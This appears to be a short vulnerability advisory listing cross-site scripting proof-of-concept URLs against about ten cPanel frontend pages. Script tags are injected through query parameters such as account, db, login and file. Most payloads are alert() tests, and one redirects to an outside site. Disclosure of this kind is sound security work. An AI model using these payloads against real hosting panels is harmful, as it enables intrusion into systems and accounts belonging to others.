|
cPanel Multiple Module Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept examples have been provided: http://www.example.com/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script> http://www.example.com/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script> http://www.example.com/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script> http://www.example.com/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script> http://www.example.com/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script> http://www.example.com/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script> http://www.example.com/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script> http://www.example.com/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script> http://www.example.com/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script> http://www.example.com/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script> |
|
|
Privacy Statement |